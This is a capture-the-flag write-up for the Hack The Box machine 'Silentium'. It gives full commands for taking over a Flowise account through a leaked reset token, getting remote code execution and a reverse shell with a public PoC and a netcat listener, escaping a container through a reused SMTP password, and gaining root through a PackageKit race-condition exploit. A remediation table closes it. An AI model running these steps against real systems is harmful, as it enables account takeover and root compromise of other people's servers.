HTB Silentium: Flowise ATO + RCE → Docker Escape → PackageKit LPE (CVE-2026-41651)

Introduction

Silentium is an Easy Linux machine built around a realistic attack chain targeting a misconfigured Flowise AI platform. The path flows through three phases: unauthenticated account takeover (CVE-2025-58434), authenticated RCE (CVE-2025-59528), Docker escape via credential reuse, and local privilege escalation using CVE-2026-41651 (Pack2TheRoot) in PackageKit.

Attack Overview

[Recon]
  nmap → ports 22, 80
  ffuf vhost fuzz → staging.silentium.htb
  Flowise 3.0.5 identified
        ↓
[CVE-2025-58434 - Unauthenticated ATO]
  POST /forgot-password → token leaked in response
  POST /reset-password → set Password123!
  Login as ben@silentium.htb
        ↓
[CVE-2025-59528 - Authenticated RCE]
  API key copied from UI
  Function() injection via CustomMCP node
  Reverse shell → root@c78c3cceb7ba (Docker)
        ↓
[Docker Escape - Credential Reuse]
  env → SMTP_PASSWORD=r04D!!_R4ge
  SSH ben@silentium.htb → user.txt
        ↓
[CVE-2026-41651 - Pack2TheRoot LPE]
  LinPEAS → PackageKit 1.2.8 vulnerable
  TOCTOU race → SUID bash
  .suid_bash -p → root.txt

Reconnaissance

Nmap scan:

nmap -Pn -sC -sV -p- --min-rate 1500 -T4 10.129.245.103

22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.15
80/tcp open  http    nginx 1.24.0 (Ubuntu)

Add the domain:

echo "10.129.245.103 silentium.htb" | sudo tee -a /etc/hosts

The main vhost is a static marketing site. A name appears: Ben, Head of Financial Systems.

Vhost fuzzing reveals a staging subdomain:

ffuf -u http://10.129.245.103 \
     -H "Host: FUZZ.silentium.htb" \
     -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt \
     -fs 8753,3142 -ac

Found: staging.silentium.htb. Add it to /etc/hosts. Querying the version:

curl http://staging.silentium.htb/api/v1/version
# {"version":"3.0.5"}

Flowise 3.0.5 – vulnerable to CVE-2025-58434 and CVE-2025-59528.

Initial Foothold – CVE-2025-58434 + CVE-2025-59528

Account Takeover (CVE-2025-58434)

The /api/v1/account/forgot-password endpoint leaks a valid reset token in the response body. Target email: ben@silentium.htb.

curl -s -X POST http://staging.silentium.htb/api/v1/account/forgot-password \
  -H "Content-Type: application/json" \
  -d '{"user":{"email":"ben@silentium.htb"}}'

Response:

{
  "username": "admin",
  "tempToken": "uncdgJ3PNd7jOLtNwPloqhIgbCJqNYwg3RLoMlUiIz4kO9BX0TimaauOgi1L0D8W"
}

Reset the password:

curl -s -X POST http://staging.silentium.htb/api/v1/account/reset-password \
  -H "Content-Type: application/json" \
  -d '{"token":"uncdgJ3PNd7jOLtNwPloqhIgbCJqNYwg3RLoMlUiIz4kO9BX0TimaauOgi1L0D8W","newPassword":"Password123!"}'

Login to obtain a session:

curl -s -X POST http://staging.silentium.htb/api/v1/auth/login \
  -H "Content-Type: application/json" \
  -d '{"email":"ben@silentium.htb","password":"Password123!"}' \
  -c cookies.txt

The user is isOrganizationAdmin: true.

Obtain API Key

Log into the Flowise UI at http://staging.silentium.htb/auth/login, navigate to Settings → API Keys, and copy the DefaultKey secret:

hWp_8jB76zi0VtKSr2d9TfGK1fm6NuNPg1uA-8FsUJc

Authenticated RCE (CVE-2025-59528)

The CustomMCP node passes user-controlled input into a Function('return ' + inputString) constructor, enabling arbitrary Node.js code execution.

Start a listener:

nc -lvnp 4444

Run the public PoC:

python3 flowise_chain.py \
  -t http://staging.silentium.htb \
  --api-key hWp_8jB76zi0VtKSr2d9TfGK1fm6NuNPg1uA-8FsUJc \
  --lhost 10.10.14.X \
  --lport 4444

A reverse shell is received as root inside a Docker container (hostname c78c3cceb7ba).

Container Escape – Credential Reuse

Check environment variables:

env

Among the output:

FLOWISE_USERNAME=ben
FLOWISE_PASSWORD=F1l3_d0ck3r
SMTP_HOST=mailhog
SMTP_PASSWORD=r04D!!_R4ge
SMTP_USER=test

The SMTP password r04D!!_R4ge is reused for SSH on the host:

ssh ben@10.129.245.103
# Password: r04D!!_R4ge

User flag:

ben@silentium:~$ cat user.txt

[redacted]

Privilege Escalation – CVE-2026-41651 (Pack2TheRoot)

LinPEAS detects PackageKit version 1.2.8 in the vulnerable range (≥1.0.2 ≤1.3.4). CVE-2026-41651 abuses a TOCTOU race condition in PackageKit to install a malicious .deb and drop a SUID binary.

Exploitation:

cd /tmp
git clone https://github.com/Vozec/CVE-2026-41651
cd CVE-2026-41651
./cve-2026-41651

Output:

[+] SUCCESS - SUID bash at t+3000ms

Gain root:

.suid_bash -p
# whoami
root

Root flag:

cat /root/root.txt

[redacted]

Key Takeaways

Vulnerability	Root Cause	Remediation
CVE-2025-58434 (ATO)	Password reset token returned in API response	Send token via email only; never expose in response body
CVE-2025-59528 (RCE)	Unsafe Function() evaluation of user input	Avoid dynamic code evaluation; use safe parsers; sandbox user input
Docker credential leakage	Secrets exposed in environment variables	Use secrets manager (Vault, Docker secrets); avoid env for sensitive data
Credential reuse	SMTP password reused for SSH	Enforce unique credentials per service
CVE-2026-41651 (PackageKit)	TOCTOU race condition in PackageKit transaction handling	Upgrade PackageKit to ≥1.3.5; disable PackageKit if not needed

Resources

• Nmap — Port scanning
• ffuf — Vhost fuzzing
• Flowise — Low-code platform
• CVE-2025-58434 & CVE-2025-59528 PoC — ATO + RCE chain
• CVE-2026-41651 PoC — PackageKit Pack2TheRoot
• LinPEAS — Local privilege escalation enumeration